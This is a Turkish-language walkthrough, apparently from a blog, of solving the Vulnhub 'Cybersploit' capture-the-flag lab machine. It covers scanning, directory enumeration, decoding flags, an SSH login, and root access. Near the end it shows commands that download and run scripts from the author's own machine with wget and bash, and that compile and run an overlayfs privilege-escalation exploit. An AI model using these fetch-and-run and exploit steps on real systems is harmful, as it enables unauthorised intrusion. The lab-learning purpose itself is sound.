Sızma Testi Örnekleri:Cybersploit

Yine bir Vulnhub makinesiyle karşınızdayım. Sızma testine yeni başlayan arkadaşlar için oldukça kolay olan Cybersploit makinesi, çözümüyle ctf kültürünü bize aşılıyor. Her zaman olduğu gibi işe makinenin ip adresini bulmayla başlayalım.

netdsicover -r 192.168.0.0/16
Cybersploit

İp adresini bulduğumuza göre şimdi de hangi portlar açık ona bakalım.

nmap -sSV -p- -T4 -sC 192.168.42.232 -oN info.txt
Cybersploit

Sadece 22 ve 80. portun açık olduğunu görüyoruz. Demek ki web’den ilerleyeceğiz. Web de bizi şöyle bir sayfa karşılıyor.

Cybersploit

“Sayfa kaynağını görüntüle” dediğimde ise karşıma beklemediğim güzel bir bilgi çıkıyor. Bu kesin işime yarar deyip geçiyorum.

Cybersploit

Tabi bu sırada gobuster ile sayfaya dizin/dosya taraması yapıyorum. (-w ile dirb in dizin/dosyaları tuttuğu listeyi belirtiyorum. -u ile websayfasının linkini. -t ile de thread’i belirliyorum.)

gobuster dir -w /usr/share/dirb/wordlists/common.txt -u http://192.168.42.232 -t 50
Cybersploit

robots.txt dosyasının olduğunu görüyorum. Karşıma base64 ile şifrelenmiş bir metin çıkıyor.

Cybersploit

Şu adrese girip decode ediyorum ve karşıma bu sefer flag değeri çıkıyor.

Cybersploit

Web sayfasında ufak bi gezintiden sonra başka birşey bulamadığım için belki elimdeki kullanıcı adı ve flag değeriyle ssh üzerinden bağlanabilirim deyip şansımı deniyorum.

ssh itsskv@192.168.42.232
Cybersploit

Makine de dolaşırken 2. bir flag çıkıyor karşıma. İçeriğine baktığımda binary değerler görüyorum.

Cybersploit

Şu adrese girip bu değerleri metne çevirdiğimde 2.flag’e de ulaşmış oluyorum.

Cybersploit

Şimdi sıra geldi root olmaya.Bunun için ben çoğu zaman Linux Exploit Suggester kullanıyorum. Kendi makinemde python ile dosya paylaşımını açtıktan sonra hedef makinede wget ile indirip çalıştırıyorum.

Kendi makinemde

python -m SimpleHTTPServer 80

Hedef makinede

wget 192.168.42.40/les.sh
bash les.sh
Cybersploit

Görüldüğü üzere karşımıza bir çok exploit çıkıyor. Ben bunlardan “overlayfs” exploitini kullanacağım.

Exploiti wget ile çekip derledikten sonrda çalıştırıyorum ve root olma şerefine layık görülüyorum.

wget 192.168.42.40/explooit.c
gcc explooit.c -o explooit -pthread
./explooit
Cybersploit

Tabi bununla da bitmiyor. /root dizini altında son bayrağımız olan “finalflag.txt” var onu da bi okuyup Cybersploit makinesini bitirelim.

Cybersploit

Bir yanıt yazın

E-posta adresiniz yayınlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir